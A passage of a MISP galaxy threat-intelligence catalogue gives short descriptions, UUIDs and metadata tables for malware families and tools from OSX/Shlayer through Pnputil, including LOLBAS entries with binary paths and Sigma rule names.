OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[Carbon Black Shlayer Feb 2019][Intego Shlayer Feb 2018]
Internal MISP references
UUID 4d91d625-21d8-484a-b63f-0a3daa4ed434
which can be used as unique global reference for OSX/Shlayer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0402 |
source | MITRE |
type | ['malware'] |
Out1
Out1 is a remote access tool written in python and used by MuddyWater since at least 2021.[Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 273b1e8d-a23d-4c22-8493-80f3d6639352
which can be used as unique global reference for Out1
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0594 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
OutSteel
OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.[Palo Alto Unit 42 OutSteel SaintBot February 2022 ]
Internal MISP references
UUID 042fe42b-f60e-45e1-b47d-a913e0677976
which can be used as unique global reference for OutSteel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1017 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OwaAuth
OwaAuth is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by Threat Group-3390. [Dell TG-3390]
Internal MISP references
UUID 6d8a8510-e6f1-49a7-b3a5-bd4664937147
which can be used as unique global reference for OwaAuth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0072 |
source | MITRE |
type | ['malware'] |
P2P ZeuS
P2P ZeuS is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. [Dell P2P ZeuS]
Internal MISP references
UUID 916f8a7c-e487-4446-b6ee-c8da712a9569
which can be used as unique global reference for P2P ZeuS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0016 |
source | MITRE |
type | ['malware'] |
P8RAT
P8RAT is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]
Internal MISP references
UUID 1933ad3d-3085-4b1b-82b9-ac51b440e2bf
which can be used as unique global reference for P8RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0626 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PACEMAKER
PACEMAKER is a credential stealer that was used by APT5 as early as 2020 including activity against US Defense Industrial Base (DIB) companies.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID 13856c51-d81c-5d75-bb6a-0bbdcc857cdd
which can be used as unique global reference for PACEMAKER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1109 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pacu
Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.[GitHub Pacu]
Internal MISP references
UUID e90eb529-1665-5fd7-a44e-695715e4081b
which can be used as unique global reference for Pacu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['IaaS'] |
software_attack_id | S1091 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796', 'a2e000da-8181-4327-bacd-32013dbd3654', '2e5f6e4a-4579-46f7-9997-6923180815dd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Pandora
Pandora is a multistage kernel rootkit with backdoor functionality that has been in use by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]
Internal MISP references
UUID 320b0784-4f0f-46ea-99e9-c34bfcca1c2e
which can be used as unique global reference for Pandora
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0664 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pasam
Pasam is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Pasam May 2012]
Internal MISP references
UUID 3f018e73-d09b-4c8d-815b-8b2c8faf7055
which can be used as unique global reference for Pasam
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0208 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pass-The-Hash Toolkit
Pass-The-Hash Toolkit is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. [Mandiant APT1]
Internal MISP references
UUID 8d007d52-8898-494c-8d72-354abd93da1e
which can be used as unique global reference for Pass-The-Hash Toolkit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0122 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PasswordFox
PasswordFox is a tool used to recover passwords from Firefox web browser.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID e12e1de8-a0d9-4602-8264-5952106bd53c
which can be used as unique global reference for PasswordFox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5037 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
P.A.S. Webshell
P.A.S. Webshell is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.[ANSSI Sandworm January 2021]
Internal MISP references
UUID 4d79530c-2fd9-4438-a8da-74f42119695a
which can be used as unique global reference for P.A.S. Webshell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0598 |
source | MITRE |
tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pay2Key
Pay2Key is a ransomware written in C++ that has been used by Fox Kitten since at least July 2020 including campaigns against Israeli companies. Pay2Key has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.[ClearkSky Fox Kitten February 2020][Check Point Pay2Key November 2020]
Internal MISP references
UUID 9aa21e50-726e-4002-8b7b-75697a03eb2b
which can be used as unique global reference for Pay2Key
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0556 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pcalua
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Program Compatibility Assistant
Author: Oddvar Moe
Paths: * C:\Windows\System32\pcalua.exe
Resources: * https://twitter.com/KyleHanslovan/status/912659279806640128
Detection: * Sigma: proc_creation_win_lolbin_pcalua.yml[Pcalua.exe - LOLBAS Project]
Internal MISP references
UUID 00daafc4-8bf1-4447-b24f-1580263124f5
which can be used as unique global reference for Pcalua
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5137 |
source | Tidal Cyber |
tags | ['074533ec-e14a-4dc3-98ae-c029904e3d6d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Pcexter
Pcexter is an uploader that has been used by ToddyCat since at least 2023 to exfiltrate stolen files.[Kaspersky ToddyCat Check Logs October 2023]
Internal MISP references
UUID 873ede85-548b-5fc0-a29e-80bd5afc5bf4
which can be used as unique global reference for Pcexter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1102 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PCHunter
PCHunter is a tool used to enable advanced task management, including for system processes and kernels.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 591acc39-1218-4710-aadc-150ae6475ee3
which can be used as unique global reference for PCHunter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5038 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PcShare
PcShare is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.[Bitdefender FunnyDream Campaign November 2020][GitHub PcShare 2014]
Internal MISP references
UUID 71eb2211-39aa-4b89-bd51-9dcabd363149
which can be used as unique global reference for PcShare
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1050 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Pcwrun
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Program Compatibility Wizard
Author: Oddvar Moe
Paths: * C:\Windows\System32\pcwrun.exe
Resources: * https://twitter.com/pabraeken/status/991335019833708544 * https://twitter.com/nas_bench/status/1535663791362519040
Detection: * Sigma: proc_creation_win_lolbin_pcwrun_follina.yml[Pcwrun.exe - LOLBAS Project]
Internal MISP references
UUID 7babb537-ec29-425a-9108-43d1619e02b5
which can be used as unique global reference for Pcwrun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5138 |
source | Tidal Cyber |
tags | ['62496b72-7820-4512-b3f9-188464bb8161', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Pcwutl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft HTML Viewer
Author: LOLBAS Team
Paths: * c:\windows\system32\pcwutl.dll * c:\windows\syswow64\pcwutl.dll
Resources: * https://twitter.com/harr0ey/status/989617817849876488 * https://windows10dll.nirsoft.net/pcwutl_dll.html
Detection: * Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ * Sigma: proc_creation_win_rundll32_susp_activity.yml[Pcwutl.dll - LOLBAS Project]
Internal MISP references
UUID 47ba2c2c-b4f3-48dc-878f-b8cab6d97f65
which can be used as unique global reference for Pcwutl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5193 |
source | Tidal Cyber |
tags | ['ff5c357e-6b9b-4ef3-a7ed-e5d4c0091c0c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Peirates
Peirates is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.[Peirates GitHub]
Internal MISP references
UUID 52a19c73-2454-4893-8f84-8d05c37a9472
which can be used as unique global reference for Peirates
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers'] |
software_attack_id | S0683 |
source | MITRE |
tags | ['2e5f6e4a-4579-46f7-9997-6923180815dd', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Penquin
Penquin is a remote access trojan (RAT) with multiple versions used by Turla to target Linux systems since at least 2014.[Kaspersky Turla Penquin December 2014][Leonardo Turla Penquin May 2020]
Internal MISP references
UUID 951fad62-f636-4c01-b924-bb0ce87f5b20
which can be used as unique global reference for Penquin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0587 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Peppy
Peppy is a Python-based remote access Trojan, active since at least 2012, with similarities to Crimson.[Proofpoint Operation Transparent Tribe March 2016]
Internal MISP references
UUID 1f080577-c002-4b49-a342-fa70983c1d58
which can be used as unique global reference for Peppy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0643 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pester
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used as part of the Powershell pester
Author: Oddvar Moe
Paths: * c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat * c:\Program Files\WindowsPowerShell\Modules\Pester*\bin\Pester.bat
Resources: * https://twitter.com/Oddvarmoe/status/993383596244258816 * https://twitter.com/st0pp3r/status/1560072680887525378 * https://twitter.com/st0pp3r/status/1560072680887525378
Detection: * Sigma: proc_creation_win_lolbin_pester_1.yml[Pester.bat - LOLBAS Project]
Internal MISP references
UUID 5028ed72-8e6b-48bd-b4f4-e42df926893d
which can be used as unique global reference for Pester
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5264 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Phobos Ransomware
This object represents a collection of MITRE ATT&CK® Techniques associated with Phobos ransomware binaries, as highlighted in sources such as joint Cybersecurity Advisory AA24-060A.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID d7015696-0aa1-4c13-a0e6-b9d8e027dabf
which can be used as unique global reference for Phobos Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5279 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PhonyC2
PhonyC2 is a command and control framework attributed to the MuddyWater group. Researchers believe the tool has existed since at least 2021 and has been regularly updated since that time. PhonyC2 is believed to have been used in a 2023 attack on an institute of technology in Israel, as well as in a MuddyWater campaign beginning in May 2023 that featured exploitation of a vulnerability in PaperCut print management software (CVE-2023-27350).[Deep Instinct PhonyC2 June 2023]
Internal MISP references
UUID c6fc073b-fa8a-4fff-a066-3fd788d3ac85
which can be used as unique global reference for PhonyC2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5307 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '992bdd33-4a47-495d-883a-58010a2f0efb', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PHOREAL
PHOREAL is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID fd63cec1-9f72-4ed0-9926-2dbbb3d9cead
which can be used as unique global reference for PHOREAL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0158 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pikabot
Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a 60-second tutorial here).
Pikabot is a malware first observed in early 2023 that has downloader/dropper and backdoor functionality. Researchers observed Pikabot distribution increase following the disruption of the QakBot botnet by authorities in August 2023. Originally distributed via spam email campaigns, researchers observed the threat actor TA577 (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike) distributing Pikabot starting in December 2023.[Malwarebytes Pikabot December 15 2023]
Internal MISP references
UUID d2a226a2-ffa1-4bb0-a090-96dc42f9c84c
which can be used as unique global reference for Pikabot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5265 |
source | Tidal Cyber |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pillowmint
Pillowmint is a point-of-sale malware used by FIN7 designed to capture credit card information.[Trustwave Pillowmint June 2020]
Internal MISP references
UUID db5d718b-1344-4aa2-8e6a-54e68d8adfb1
which can be used as unique global reference for Pillowmint
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0517 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PinchDuke
PinchDuke is malware that was used by APT29 from 2008 to 2010. [F-Secure The Dukes]
Internal MISP references
UUID ba2208c8-5e1e-46cd-bef1-ffa7a2be3be4
which can be used as unique global reference for PinchDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0048 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ping
Ping is an operating system utility commonly used to troubleshoot and verify network connections. [TechNet Ping]
Internal MISP references
UUID 4ea12106-c0a1-4546-bb64-a1675d9f5dc7
which can be used as unique global reference for Ping
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0097 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PingCastle
PingCastle is a tool that can be used to enumerate Active Directory and map trust relationships. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID 1debf242-3c91-4bdb-932c-27d61fe17474
which can be used as unique global reference for PingCastle
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5003 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PingPull
PingPull is a remote access Trojan (RAT) written in Visual C++ that has been used by GALLIUM since at least June 2022. PingPull has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.[Unit 42 PingPull Jun 2022]
Internal MISP references
UUID 4360cc62-7263-48b2-bd2a-a7737563545c
which can be used as unique global reference for PingPull
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1031 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PipeMon
PipeMon is a multi-stage modular backdoor used by Winnti Group.[ESET PipeMon May 2020]
Internal MISP references
UUID 92744f7b-9f1a-472c-bae0-2d4a7ce68bb4
which can be used as unique global reference for PipeMon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0501 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pisloader
Pisloader is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by APT18 and is similar to another malware family, HTTPBrowser, that has been used by the group. [Palo Alto DNS Requests]
Internal MISP references
UUID 14e65c5d-5164-41a3-92de-67fdd1d529d2
which can be used as unique global reference for Pisloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0124 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PITSTOP
PITSTOP is a backdoor that was deployed on compromised Ivanti Connect Secure VPNs during Cutting Edge to enable command execution and file read/write.[Mandiant Cutting Edge Part 3 February 2024]
Internal MISP references
UUID c0e56f14-9768-5547-abcb-aa3f220d0e40
which can be used as unique global reference for PITSTOP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1123 |
source | MITRE |
type | ['malware'] |
Pktmon
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: Derek Johnson
Paths: * c:\windows\system32\pktmon.exe * c:\windows\syswow64\pktmon.exe
Resources: * https://binar-x79.com/windows-10-secret-sniffer/
Detection: * Sigma: proc_creation_win_lolbin_pktmon.yml * IOC: .etl files found on system[Pktmon.exe - LOLBAS Project]
Internal MISP references
UUID 0b0ae21a-987c-44c5-93db-3b228544eb99
which can be used as unique global reference for Pktmon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5139 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PLAINTEE
PLAINTEE is a malware sample that has been used by Rancor in targeted attacks in Singapore and Cambodia. [Rancor Unit42 June 2018]
Internal MISP references
UUID 9445f18a-a796-447a-a35f-94a9fb72411c
which can be used as unique global reference for PLAINTEE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0254 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Play Ransomware
Play is a ransomware operation first observed in July 2022. Security researchers have observed filename, filepath, and TTP overlaps between Play and Hive and Nokayawa ransomwares, which themselves are believed to be linked.[Trend Micro Play Playbook September 06 2022] According to publicly available ransomware extortion threat data, Play has claimed nearly 200 victims from a wide range of sectors on its data leak site since December 2022.[GitHub ransomwatch]
Internal MISP references
UUID aeafc9f4-e3b4-42ec-a156-4a05f1aa5ea3
which can be used as unique global reference for Play Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5300 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PLEAD
PLEAD is a remote access tool (RAT) and downloader used by BlackTech in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.[TrendMicro BlackTech June 2017][JPCert PLEAD Downloader June 2018] PLEAD has also been referred to as TSCookie, though more recent reporting indicates likely separation between the two. PLEAD was observed in use as early as March 2017.[JPCert TSCookie March 2018][JPCert PLEAD Downloader June 2018]
Internal MISP references
UUID 9a890a85-afbe-4c35-a3e7-1adad481bdf7
which can be used as unique global reference for PLEAD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0435 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Plink
Plink is a tool used to automate Secure Shell (SSH) actions on Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 6117e2b5-140b-49d2-89b7-76d91e6c798c
which can be used as unique global reference for Plink
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5041 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a1427c89-2ebd-440f-b7e0-9728e3ef2096', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PlugX
PlugX is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.[Lastline PlugX Analysis][FireEye Clandestine Fox Part 2][New DragonOK][Dell TG-3390]
Internal MISP references
UUID 070b56f4-7810-4dad-b85f-bdfce9c08c10
which can be used as unique global reference for PlugX
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0013 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
pngdowner
pngdowner is malware used by Putter Panda. It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and- execute" utility. [CrowdStrike Putter Panda]
Internal MISP references
UUID 95c273d2-3081-4cb5-8d41-37eb4e90264d
which can be used as unique global reference for pngdowner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0067 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pnputil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for installing drivers
Author: Hai vaknin (lux)
Paths: * C:\Windows\system32\pnputil.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml[Pnputil.exe - LOLBAS Project]
Internal MISP references
UUID dd1e8b57-4900-4823-b194-1526c1e00099
which can be used as unique global reference for Pnputil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5140 |
source | Tidal Cyber |
tags | ['6d924d43-5de3-45de-8466-a8c47a5b9e68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PoetRAT
